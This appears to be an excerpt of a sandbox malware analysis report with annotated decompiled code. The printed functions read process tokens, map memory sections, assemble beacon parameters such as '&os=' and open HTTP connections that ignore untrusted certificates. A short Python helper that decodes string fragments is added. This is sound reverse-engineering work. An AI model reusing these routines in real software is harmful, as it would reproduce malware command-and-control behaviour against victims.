                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    C-Code - Quality: 38%
E010960CC(char _a4, void* _a8) {
    void* _v8;
    void* _v12;
    char _v16;
    void* _v20;
    char _v24;
    char _v28;
    char _v32;
    char _v36;
    char _v40;
    void* _v44;
    void** _t33;
    void* _t40;
    void* _t43;
    void** _t44;
    intOrPtr* _t47;
    char _t48;

    // zero the stack structures (OBJECT_ATTRIBUTES / CLIENT_ID) before filling them in
    asm("stosd");
    asm("stosd");
    asm("stosd");
    asm("stosd");
    asm("stosd");
    _v20 = _a4;                 // CLIENT_ID.UniqueProcess = target process id passed by the caller
    _t48 = 0;                   // return value: 1 on success, 0 otherwise
    _v16 = 0;
    _a4 = 0;                    // reused below as the ReturnLength out-parameter
    _v44 = 0x18;                // OBJECT_ATTRIBUTES.Length = sizeof(OBJECT_ATTRIBUTES)
    _v40 = 0;
    _v32 = 0;
    _v36 = 0;
    _v28 = 0;
    _v24 = 0;
    // 0x400 = PROCESS_QUERY_INFORMATION
    if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
        _t33 =  &_v8;
        __imp__(_v12, 8, _t33);                 // NtOpenProcessToken (see APIs below), 8 = TOKEN_QUERY
        if(_t33 >= 0) {
            _t47 = __imp__;                     // NtQueryInformationToken
            // TokenInformationClass 1 = TokenUser; first call with a NULL buffer only obtains the required size
             *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
            _t44 = E01096A51(_a4);              // heap-allocate a buffer of that size (RtlAllocateHeap, see subcall)
            if(_t44 != 0) {
                _t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed   second call fills the TOKEN_USER structure
                if(_t40 >= 0) {
                    // copy 0x1c bytes starting at TOKEN_USER.User.Sid into the caller's buffer
                    memcpy(_a8,  *_t44, 0x1c);
                    _t48 = 1;
                }
                E0109692B(_t44);                // release the temporary buffer
            }
            NtClose(_v8); // executed
        }
        NtClose(_v12);
    }
    return _t48;
}

                                                    APIs
                                                    • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 01096113
                                                    • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 01096126
                                                    • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 01096142
                                                      • Part of subcall function 01096A51: RtlAllocateHeap.NTDLL(00000000,00000000,01093005), ref: 01096A5D
                                                    • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 0109615F
                                                    • memcpy.NTDLL(?,00000000,0000001C), ref: 0109616C
                                                    • NtClose.NTDLL(?), ref: 0109617E
                                                    • NtClose.NTDLL(00000000), ref: 01096188
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                    • Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd
                                                    Similarity
                                                    • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                                    • String ID:
                                                    • API String ID: 2575439697-0
                                                    • Opcode ID: e329978d478de16c82c26fa462feb2050ed1edde3c570ba936cbd5c1ee91e620
                                                    • Instruction ID: 5754e3b320eb6215179f4893988b6afd53e66d1bb62aae18a8471bc099c0432b
                                                    • Opcode Fuzzy Hash: e329978d478de16c82c26fa462feb2050ed1edde3c570ba936cbd5c1ee91e620
                                                    • Instruction Fuzzy Hash: 782114B2900219BFDF119FA5CC85ADEBFBDFF48740F104026FA45A6150D7768A54EBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 72%
E00401B6A(intOrPtr* __eax, void** _a4) {
    int _v12;
    void* _v16;
    void* _v20;
    void* _v24;
    int _v28;
    int _v32;
    intOrPtr _v36;
    int _v40;
    int _v44;
    void* _v48;
    void* __esi;
    long _t34;
    void* _t39;
    void* _t47;
    intOrPtr* _t48;

    // context object in eax: [0] receives the section handle, [+4] = size, [+8] = page protection,
    // [+0x18] and [+0x1c] are callbacks invoked on failure
    _t48 = __eax;
    // zero the OBJECT_ATTRIBUTES on the stack
    asm("stosd");
    asm("stosd");
    asm("stosd");
    asm("stosd");
    asm("stosd");
    asm("stosd");
    _v24 =  *((intOrPtr*)(__eax + 4));   // MaximumSize of the section, taken from the context
    _v16 = 0;
    _v12 = 0;
    _v48 = 0x18;                         // OBJECT_ATTRIBUTES.Length
    _v44 = 0;
    _v36 = 0x40;                         // OBJECT_ATTRIBUTES.Attributes = OBJ_CASE_INSENSITIVE
    _v40 = 0;
    _v32 = 0;
    _v28 = 0;
    // SECTION_ALL_ACCESS (0xF001F), page protection from the context, SEC_COMMIT (0x8000000), no backing file:
    // a pagefile-backed section that is later mapped into the process (see E00401E0F below)
    _t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
    if(_t34 < 0) {
        _t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);   // failure callback receives the NTSTATUS
    } else {
         *_t48 = _v16;                                // store the section handle in the context
        _t39 = E00401E0F(_t48,  &_v12); // executed   map a view of the section
        _t47 = _t39;
        if(_t47 != 0) {
             *((intOrPtr*)(_t48 + 0x1c))(_v16);        // mapping failed: cleanup callback on the section handle
        } else {
            memset(_v12, 0, _v24);                    // zero the mapped view
             *_a4 = _v12;                             // return the view base address to the caller
        }
    }
    return _t47;
}

                                                    APIs
                                                    • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74714EE0,00000000,00000000,?), ref: 00401BC7
                                                      • Part of subcall function 00401E0F: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,00401BDC,00000002,00000000,?,?,00000000,?,?,00401BDC,00000002), ref: 00401E3C
                                                    • memset.NTDLL ref: 00401BE9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.819938819.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000007.00000002.819938819.0000000000404000.00000040.00000400.00020000.00000000.sdmp
                                                    • Associated: 00000007.00000002.819938819.0000000000406000.00000040.00000400.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_400000_maintainabovl.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Section$CreateViewmemset
                                                    • String ID: @
                                                    • API String ID: 2533685722-2766056989
                                                    • Opcode ID: dc51e99e985c587c6bdcc215b8e38f7c5ab096fbb2da54a34adaec0d697700eb
                                                    • Instruction ID: 86795c6970af49b208d53480fd9cbf16b2ab40a5dba41f078df892c72b7e177b
                                                    • Opcode Fuzzy Hash: dc51e99e985c587c6bdcc215b8e38f7c5ab096fbb2da54a34adaec0d697700eb
                                                    • Instruction Fuzzy Hash: 32211AB6D00209AFDB11DFA9C8849EEFBB9FF48354F10443AE605F3250D735AA458BA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 68%
E00401E0F(void** __esi, PVOID* _a4) {
    long _v8;
    void* _v12;
    void* _v16;
    long _t13;

    _v16 = 0;                    // SectionOffset = 0
    asm("stosd");
    _v8 = 0;                     // ViewSize = 0: map the entire section
    // map into the current process (ProcessHandle = -1); InheritDisposition 2 = ViewUnmap;
    // Win32Protect comes from __esi[2], the page protection stored in the context object
    _t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
    if(_t13 < 0) {
        _push(_t13);
        return __esi[6]();       // failure callback at context offset 0x18, same as in E00401B6A
    }
    return 0;
}

                                                    APIs
                                                    • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,00401BDC,00000002,00000000,?,?,00000000,?,?,00401BDC,00000002), ref: 00401E3C
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.819938819.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000007.00000002.819938819.0000000000404000.00000040.00000400.00020000.00000000.sdmp
                                                    • Associated: 00000007.00000002.819938819.0000000000406000.00000040.00000400.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_400000_maintainabovl.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: SectionView
                                                    • String ID:
                                                    • API String ID: 1323581903-0
                                                    • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                    • Instruction ID: 99f167ae56d6ca61dd9da5d948817d9e93ba348959c2c5d182d9c992146f9afb
                                                    • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                    • Instruction Fuzzy Hash: E8F037B590020CFFDB119FA5CC85C9FBBBDEB44354B104D3AF552E10A0D6309E089B60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    C-Code - Quality: 69%
                                                    			E01093660(long __eax, void* __ecx, void* __edx, void* _a12, intOrPtr _a20) {
                                                    				intOrPtr _v4;
                                                    				intOrPtr _v8;
                                                    				intOrPtr _v16;
                                                    				intOrPtr _v20;
                                                    				intOrPtr _v24;
                                                    				intOrPtr _v28;
                                                    				intOrPtr _v32;
                                                    				void* _v48;
                                                    				intOrPtr _v56;
                                                    				void* __edi;
                                                    				intOrPtr _t30;
                                                    				void* _t31;
                                                    				intOrPtr _t33;
                                                    				intOrPtr _t34;
                                                    				intOrPtr _t35;
                                                    				intOrPtr _t36;
                                                    				intOrPtr _t37;
                                                    				void* _t40;
                                                    				intOrPtr _t41;
                                                    				int _t44;
                                                    				intOrPtr _t45;
                                                    				int _t48;
                                                    				void* _t49;
                                                    				intOrPtr _t53;
                                                    				intOrPtr _t59;
                                                    				intOrPtr _t63;
                                                    				intOrPtr* _t65;
                                                    				void* _t66;
                                                    				intOrPtr _t71;
                                                    				intOrPtr _t77;
                                                    				intOrPtr _t80;
                                                    				intOrPtr _t83;
                                                    				int _t86;
                                                    				intOrPtr _t88;
                                                    				int _t91;
                                                    				intOrPtr _t93;
                                                    				int _t96;
                                                    				void* _t98;
                                                    				void* _t99;
                                                    				void* _t103;
                                                    				void* _t105;
                                                    				void* _t106;
                                                    				intOrPtr _t107;
                                                    				long _t109;
                                                    				intOrPtr* _t110;
                                                    				intOrPtr* _t111;
                                                    				long _t112;
                                                    				int _t113;
                                                    				void* _t114;
                                                    				void* _t115;
                                                    				void* _t116;
                                                    				void* _t119;
                                                    				void* _t120;
                                                    				void* _t122;
                                                    				void* _t123;
                                                    
                                                    				_t103 = __edx;
                                                    				_t99 = __ecx;
                                                    				_t120 =  &_v16;
                                                    				_t112 = __eax;
                                                    				_t30 =  *0x109a3e0; // 0x1b09be0
                                                    				_v4 = _t30;
                                                    				_v8 = 8;
                                                    				_t31 = RtlAllocateHeap( *0x109a2d8, 0, 0x800); // executed
                                                    				_t98 = _t31;
                                                    				if(_t98 != 0) {
                                                    					if(_t112 == 0) {
                                                    						_t112 = GetTickCount();
                                                    					}
                                                    					_t33 =  *0x109a018; // 0x99c08bf
                                                    					asm("bswap eax");
                                                    					_t34 =  *0x109a014; // 0x3a87c8cd
                                                    					asm("bswap eax");
                                                    					_t35 =  *0x109a010; // 0xd8d2f808
                                                    					asm("bswap eax");
                                                    					_t36 =  *0x109a00c; // 0x81762942
                                                    					asm("bswap eax");
                                                    					_t37 =  *0x109a348; // 0xa6d5a8
                                                    					_t3 = _t37 + 0x109b62b; // 0x74666f73
                                                    					_t113 = wsprintfA(_t98, _t3, 2, 0x3d189, _t36, _t35, _t34, _t33,  *0x109a02c,  *0x109a004, _t112);
                                                    					_t40 = E01092C6E();
                                                    					_t41 =  *0x109a348; // 0xa6d5a8
                                                    					_t4 = _t41 + 0x109b66b; // 0x74707526
                                                    					_t44 = wsprintfA(_t113 + _t98, _t4, _t40);
                                                    					_t122 = _t120 + 0x38;
                                                    					_t114 = _t113 + _t44;
                                                    					if(_a12 != 0) {
                                                    						_t93 =  *0x109a348; // 0xa6d5a8
                                                    						_t8 = _t93 + 0x109b676; // 0x732526
                                                    						_t96 = wsprintfA(_t114 + _t98, _t8, _a12);
                                                    						_t122 = _t122 + 0xc;
                                                    						_t114 = _t114 + _t96;
                                                    					}
                                                    					_t45 =  *0x109a348; // 0xa6d5a8
                                                    					_t10 = _t45 + 0x109b2de; // 0x74636126
                                                    					_t48 = wsprintfA(_t114 + _t98, _t10, 0);
                                                    					_t123 = _t122 + 0xc;
                                                    					_t115 = _t114 + _t48; // executed
                                                    					_t49 = E0109131C(_t99); // executed
                                                    					_t105 = _t49;
                                                    					if(_t105 != 0) {
                                                    						_t88 =  *0x109a348; // 0xa6d5a8
                                                    						_t12 = _t88 + 0x109b8c2; // 0x736e6426
                                                    						_t91 = wsprintfA(_t115 + _t98, _t12, _t105);
                                                    						_t123 = _t123 + 0xc;
                                                    						_t115 = _t115 + _t91;
                                                    						HeapFree( *0x109a2d8, 0, _t105);
                                                    					}
                                                    					_t106 = E010916DD();
                                                    					if(_t106 != 0) {
                                                    						_t83 =  *0x109a348; // 0xa6d5a8
                                                    						_t14 = _t83 + 0x109b8ca; // 0x6f687726
                                                    						_t86 = wsprintfA(_t115 + _t98, _t14, _t106);
                                                    						_t123 = _t123 + 0xc;
                                                    						_t115 = _t115 + _t86;
                                                    						HeapFree( *0x109a2d8, 0, _t106);
                                                    					}
                                                    					_t107 =  *0x109a3cc; // 0x1b09600
                                                    					_a20 = E01093A89(0x109a00a, _t107 + 4);
                                                    					_t53 =  *0x109a36c; // 0x1b095b0
                                                    					_t109 = 0;
                                                    					if(_t53 != 0) {
                                                    						_t80 =  *0x109a348; // 0xa6d5a8
                                                    						_t17 = _t80 + 0x109b889; // 0x3d736f26
                                                    						wsprintfA(_t115 + _t98, _t17, _t53);
                                                    					}
                                                    					if(_a20 != _t109) {
                                                    						_t116 = RtlAllocateHeap( *0x109a2d8, _t109, 0x800);
                                                    						if(_t116 != _t109) {
                                                    							E0109785D(GetTickCount());
                                                    							_t59 =  *0x109a3cc; // 0x1b09600
                                                    							__imp__(_t59 + 0x40);
                                                    							asm("lock xadd [eax], ecx");
                                                    							_t63 =  *0x109a3cc; // 0x1b09600
                                                    							__imp__(_t63 + 0x40);
                                                    							_t65 =  *0x109a3cc; // 0x1b09600
                                                    							_t66 = E0109581D(1, _t103, _t98,  *_t65); // executed
                                                    							_t119 = _t66;
                                                    							asm("lock xadd [eax], ecx");
                                                    							if(_t119 != _t109) {
                                                    								StrTrimA(_t119, 0x1099280);
                                                    								_push(_t119);
                                                    								_t71 = E010911A3();
                                                    								_v20 = _t71;
                                                    								if(_t71 != _t109) {
                                                    									_t110 = __imp__; // lstrcpy (API list, refs 0109388C and 01093893)
                                                    									 *_t110(_t119, _v8);
                                                    									 *_t110(_t116, _v8);
                                                    									_t111 = __imp__; // lstrcat (API list, refs 010938A0 and 010938A4)
                                                    									 *_t111(_t116, _v32);
                                                    									 *_t111(_t116, _t119);
                                                    									_t77 = E01095B63(0xffffffffffffffff, _t116, _v28, _v24); // executed
                                                    									_v56 = _t77;
                                                    									if(_t77 != 0 && _t77 != 0x10d2) {
                                                    										E01091103();
                                                    									}
                                                    									HeapFree( *0x109a2d8, 0, _v48);
                                                    									_t109 = 0;
                                                    								}
                                                    								HeapFree( *0x109a2d8, _t109, _t119);
                                                    							}
                                                    							RtlFreeHeap( *0x109a2d8, _t109, _t116); // executed
                                                    						}
                                                    						HeapFree( *0x109a2d8, _t109, _a12);
                                                    					}
                                                    					RtlFreeHeap( *0x109a2d8, _t109, _t98); // executed
                                                    				}
                                                    				return _v16;
                                                    			}

                                                    Listing address range: 0x01093660 to 0x01093922

                                                    APIs
                                                    • RtlAllocateHeap.NTDLL ref: 01093688
                                                    • GetTickCount.KERNEL32 ref: 0109369C
                                                    • wsprintfA.USER32 ref: 010936EB
                                                    • wsprintfA.USER32 ref: 01093708
                                                    • wsprintfA.USER32 ref: 01093729
                                                    • wsprintfA.USER32 ref: 01093741
                                                    • wsprintfA.USER32 ref: 01093764
                                                    • HeapFree.KERNEL32(00000000,00000000), ref: 01093774
                                                    • wsprintfA.USER32 ref: 01093796
                                                    • HeapFree.KERNEL32(00000000,00000000), ref: 010937A6
                                                    • wsprintfA.USER32 ref: 010937DE
                                                    • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 010937F9
                                                    • GetTickCount.KERNEL32 ref: 01093809
                                                    • RtlEnterCriticalSection.NTDLL(01B095C0), ref: 0109381D
                                                    • RtlLeaveCriticalSection.NTDLL(01B095C0), ref: 0109383B
                                                      • Part of subcall function 0109581D: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,775EC740,0109384E,00000000,01B09600), ref: 01095848
                                                      • Part of subcall function 0109581D: lstrlen.KERNEL32(00000000,?,775EC740,0109384E,00000000,01B09600), ref: 01095850
                                                      • Part of subcall function 0109581D: strcpy.NTDLL ref: 01095867
                                                      • Part of subcall function 0109581D: lstrcat.KERNEL32(00000000,00000000), ref: 01095872
                                                      • Part of subcall function 0109581D: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,0109384E,?,775EC740,0109384E,00000000,01B09600), ref: 0109588F
                                                    • StrTrimA.SHLWAPI(00000000,01099280,00000000,01B09600), ref: 0109386D
                                                      • Part of subcall function 010911A3: lstrlen.KERNEL32(01B09BD0,00000000,00000000,00000000,01093879,00000000), ref: 010911B3
                                                      • Part of subcall function 010911A3: lstrlen.KERNEL32(?), ref: 010911BB
                                                      • Part of subcall function 010911A3: lstrcpy.KERNEL32(00000000,01B09BD0), ref: 010911CF
                                                      • Part of subcall function 010911A3: lstrcat.KERNEL32(00000000,?), ref: 010911DA
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0109388C
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 01093893
                                                    • lstrcat.KERNEL32(00000000,?), ref: 010938A0
                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 010938A4
                                                      • Part of subcall function 01095B63: WaitForSingleObject.KERNEL32(00000000,747581D0,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 01095C15
                                                    • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 010938D4
                                                    • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 010938E4
                                                    • RtlFreeHeap.NTDLL(00000000,00000000,00000000,01B09600), ref: 010938F2
                                                    • HeapFree.KERNEL32(00000000,?), ref: 01093903
                                                    • RtlFreeHeap.NTDLL(00000000,00000000), ref: 01093911
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                    • Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd
                                                    Similarity
                                                    • API ID: Heap$Freewsprintf$lstrcatlstrlen$lstrcpy$AllocateCountCriticalSectionTickTrim$EnterLeaveObjectSingleWaitstrcpy
                                                    • String ID: Uqt
                                                    • API String ID: 186568778-2320327147
                                                    • Opcode ID: a9983658b4aa361fc808d00ad52de6fe65b0d87816ebbd8c992bc8c462cd1c8f
                                                    • Instruction ID: fb07d842a01bb3ee85ee65a15cf18a2bf0824749f6f2ef8b0c95ff2013f18d4f
                                                    • Opcode Fuzzy Hash: a9983658b4aa361fc808d00ad52de6fe65b0d87816ebbd8c992bc8c462cd1c8f
                                                    • Instruction Fuzzy Hash: 6071D571600205EFCB31AB69EC68E9B3BE8FBC8710B054554F9C9D7224D63BD905EB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%
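The `// 0x...` comments the decompiler attaches to assignments such as `_t17 = _t80 + 0x109b889; // 0x3d736f26` are the dword stored at the computed address. For pointers into the string table that dword is the first four bytes of the string, so reading it as little-endian ASCII recovers the text the malware passes on: 0x3d736f26 is `&os=`, the start of the format string wsprintfA receives in this function. The same reading applies to the logged argument values in the API list, where `253D7325` on the lstrlen entry of subcall 0109581D is `%s=%`. The Python below is an added example, not part of the Joe Sandbox report; it reproduces that decoding over lines copied from the listing above (constructed sample input) and is not a complete parser of the report format.

```python
import re
from typing import Dict, List, Optional

# Constructed sample: lines copied from the E01093660 listing above (decompiled
# pseudo-C plus one entry from its API list). Not a full parser of Joe Sandbox output.
SAMPLE_PSEUDOC = """\
_t80 =  *0x109a348; // 0xa6d5a8
_t17 = _t80 + 0x109b889; // 0x3d736f26
wsprintfA(_t115 + _t98, _t17, _t53);
"""
SAMPLE_API_LINE = (
    "lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,"
    "775EC740,0109384E,00000000,01B09600), ref: 01095848"
)

# "_tNN = <expr>; // 0x<dword>": the decompiler's comment is the dword stored at the
# address the expression evaluates to.
ASSIGN_RE = re.compile(r"^\s*(\w+)\s*=\s*(.+?);\s*//\s*0x([0-9a-fA-F]+)\s*$")
# Eight-hex-digit argument values as printed in the API list.
ARG_RE = re.compile(r"[0-9A-Fa-f]{8}")


def dword_to_ascii(value: int) -> Optional[str]:
    """Read a 32-bit value as up to four little-endian bytes of printable ASCII.

    Trailing NUL bytes are allowed ("GET" is 0x00544547); any other byte outside
    0x20..0x7E means the value was a pointer, length or flag, and None is returned.
    """
    raw = value.to_bytes(4, "little").rstrip(b"\x00")
    if not raw or any(b < 0x20 or b > 0x7E for b in raw):
        return None
    return raw.decode("ascii")


def extract_fragments(pseudoc: str) -> Dict[str, str]:
    """Map decompiler temporaries to the ASCII their commented dword spells."""
    fragments: Dict[str, str] = {}
    for line in pseudoc.splitlines():
        m = ASSIGN_RE.match(line)
        if not m:
            continue
        var, _expr, hexval = m.groups()
        text = dword_to_ascii(int(hexval, 16))
        if text is not None:
            fragments[var] = text
    return fragments


def annotate_calls(pseudoc: str) -> List[str]:
    """Append the recovered text to every non-assignment line that uses such a
    temporary, so wsprintfA(buf, _t17, n) can be read as wsprintfA(buf, "&os=...", n)."""
    fragments = extract_fragments(pseudoc)
    out: List[str] = []
    for line in pseudoc.splitlines():
        if ASSIGN_RE.match(line):
            out.append(line)
            continue
        used = [f'{var}="{text}"' for var, text in fragments.items()
                if re.search(rf"\b{re.escape(var)}\b", line)]
        out.append(line + ("  // " + ", ".join(used) if used else ""))
    return out


def decode_api_args(api_line: str) -> Dict[int, str]:
    """Decode the argument column of an API-list entry: position -> ASCII, for the
    arguments whose logged value reads as text (0x253D7325 -> "%s=%")."""
    if "(" not in api_line or ")" not in api_line:
        return {}
    inner = api_line[api_line.index("(") + 1:api_line.rindex(")")]
    decoded: Dict[int, str] = {}
    for pos, arg in enumerate(inner.split(",")):
        arg = arg.strip()
        if ARG_RE.fullmatch(arg):
            text = dword_to_ascii(int(arg, 16))
            if text is not None:
                decoded[pos] = text
    return decoded


if __name__ == "__main__":
    print("\n".join(annotate_calls(SAMPLE_PSEUDOC)))
    print(decode_api_args(SAMPLE_API_LINE))
```

Pointer-valued and length-valued arguments (00000000, 775EC740, 01B09600) fail the printable check and are skipped, which is what keeps the output to genuine string fragments; the check is deliberately strict, so a string that begins with a non-ASCII byte would be missed rather than misreported.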

                                                    Control-flow Graph

                                                    C-Code - Quality: 92%
                                                    			E01097AC4(void* __eax, void* __ecx, long __esi, char* _a4) {
                                                    				void _v8;
                                                    				long _v12;
                                                    				void _v16;
                                                    				void* _t34;
                                                    				void* _t38;
                                                    				void* _t40;
                                                    				char* _t56;
                                                    				long _t57;
                                                    				void* _t58;
                                                    				intOrPtr _t59;
                                                    				long _t65;
                                                    
                                                    				_t65 = __esi;
                                                    				_t58 = __ecx;
                                                    				_v16 = 0xea60; // 60000 ms, used below as the send and receive timeout
                                                    				__imp__( *(__esi + 4));
                                                    				_v12 = __eax + __eax;
                                                    				_t56 = E01096A51(__eax + __eax + 1);
                                                    				if(_t56 != 0) {
                                                    					if(InternetCanonicalizeUrlA( *(__esi + 4), _t56,  &_v12, 0) == 0) {
                                                    						E0109692B(_t56);
                                                    					} else {
                                                    						E0109692B( *(__esi + 4));
                                                    						 *(__esi + 4) = _t56;
                                                    					}
                                                    				}
                                                    				_t34 = InternetOpenA(_a4, 0, 0, 0, 0x10000000); // executed; 0x10000000 = INTERNET_FLAG_ASYNC, hence the status callback and the event wait below
                                                    				 *(_t65 + 0x10) = _t34;
                                                    				if(_t34 == 0 || InternetSetStatusCallback(_t34, E01097A59) == 0xffffffff) {
                                                    					L15:
                                                    					return GetLastError();
                                                    				} else {
                                                    					ResetEvent( *(_t65 + 0x1c));
                                                    					_t38 = InternetConnectA( *(_t65 + 0x10),  *_t65, 0x50, 0, 0, 3, 0, _t65); // executed; port 0x50 = 80, service 3 = INTERNET_SERVICE_HTTP, context = this object
                                                    					 *(_t65 + 0x14) = _t38;
                                                    					if(_t38 != 0 || GetLastError() == 0x3e5 && E010917ED( *(_t65 + 0x1c), _t58, 0xea60) == 0) { // 0x3e5 = ERROR_IO_PENDING: wait up to 60 s on the event the callback signals
                                                    						_t59 =  *0x109a348; // 0xa6d5a8
                                                    						_t15 = _t59 + 0x109b73b; // 0x544547 reads "GET" as little-endian ASCII: the HTTP verb
                                                    						_v8 = 0x84404000;
                                                    						_t40 = HttpOpenRequestA( *(_t65 + 0x14), _t15,  *(_t65 + 4), 0, 0, 0, 0x84404000, _t65); // executed; INTERNET_FLAG_RELOAD | INTERNET_FLAG_NO_CACHE_WRITE | INTERNET_FLAG_KEEP_CONNECTION | INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, no INTERNET_FLAG_SECURE (plaintext HTTP)
                                                    						 *(_t65 + 0x18) = _t40;
                                                    						if(_t40 == 0) {
                                                    							goto L15;
                                                    						}
                                                    						_t57 = 4;
                                                    						_v12 = _t57;
                                                    						if(InternetQueryOptionA(_t40, 0x1f,  &_v8,  &_v12) != 0) { // 0x1f = INTERNET_OPTION_SECURITY_FLAGS
                                                    							_v8 = _v8 | 0x00000100; // SECURITY_FLAG_IGNORE_UNKNOWN_CA: certificates from untrusted CAs are accepted if the request ends up on HTTPS
                                                    							InternetSetOptionA( *(_t65 + 0x18), 0x1f,  &_v8, _t57);
                                                    						}
                                                    						if(InternetSetOptionA( *(_t65 + 0x18), 6,  &_v16, _t57) == 0 || InternetSetOptionA( *(_t65 + 0x18), 5,  &_v16, _t57) == 0) { // 6 = INTERNET_OPTION_RECEIVE_TIMEOUT, 5 = INTERNET_OPTION_SEND_TIMEOUT, both set to _v16 = 0xea60 = 60000 ms
                                                    							goto L15;
                                                    						} else {
                                                    							return 0;
                                                    						}
                                                    					} else {
                                                    						goto L15;
                                                    					}
                                                    				}
                                                    			}

                                                    Listing address range: 0x01097ac4 to 0x01097c15

                                                    APIs
                                                    • lstrlen.KERNEL32(?,00000008,74714D40), ref: 01097AD6
                                                      • Part of subcall function 01096A51: RtlAllocateHeap.NTDLL(00000000,00000000,01093005), ref: 01096A5D
                                                    • InternetCanonicalizeUrlA.WININET(?,00000000,00000000,00000000), ref: 01097AF9
                                                    • InternetOpenA.WININET(00000000,00000000,00000000,00000000,10000000), ref: 01097B21
                                                    • InternetSetStatusCallback.WININET(00000000,01097A59), ref: 01097B38
                                                    • ResetEvent.KERNEL32(?), ref: 01097B4A
                                                    • InternetConnectA.WININET(?,?,00000050,00000000,00000000,00000003,00000000,?), ref: 01097B5D
                                                    • GetLastError.KERNEL32 ref: 01097B6A
                                                    • HttpOpenRequestA.WININET(?,00544547,?,00000000,00000000,00000000,84404000,?), ref: 01097BB0
                                                    • InternetQueryOptionA.WININET(00000000,0000001F,00000000,00000000), ref: 01097BCE
                                                    • InternetSetOptionA.WININET(?,0000001F,00000100,00000004), ref: 01097BEF
                                                    • InternetSetOptionA.WININET(?,00000006,0000EA60,00000004), ref: 01097BFB
                                                    • InternetSetOptionA.WININET(?,00000005,0000EA60,00000004), ref: 01097C0B
                                                    • GetLastError.KERNEL32 ref: 01097C15
                                                      • Part of subcall function 0109692B: RtlFreeHeap.NTDLL(00000000,00000000,01093092,00000000,?,00000000,00000000), ref: 01096937
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                    • Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd
                                                    Similarity
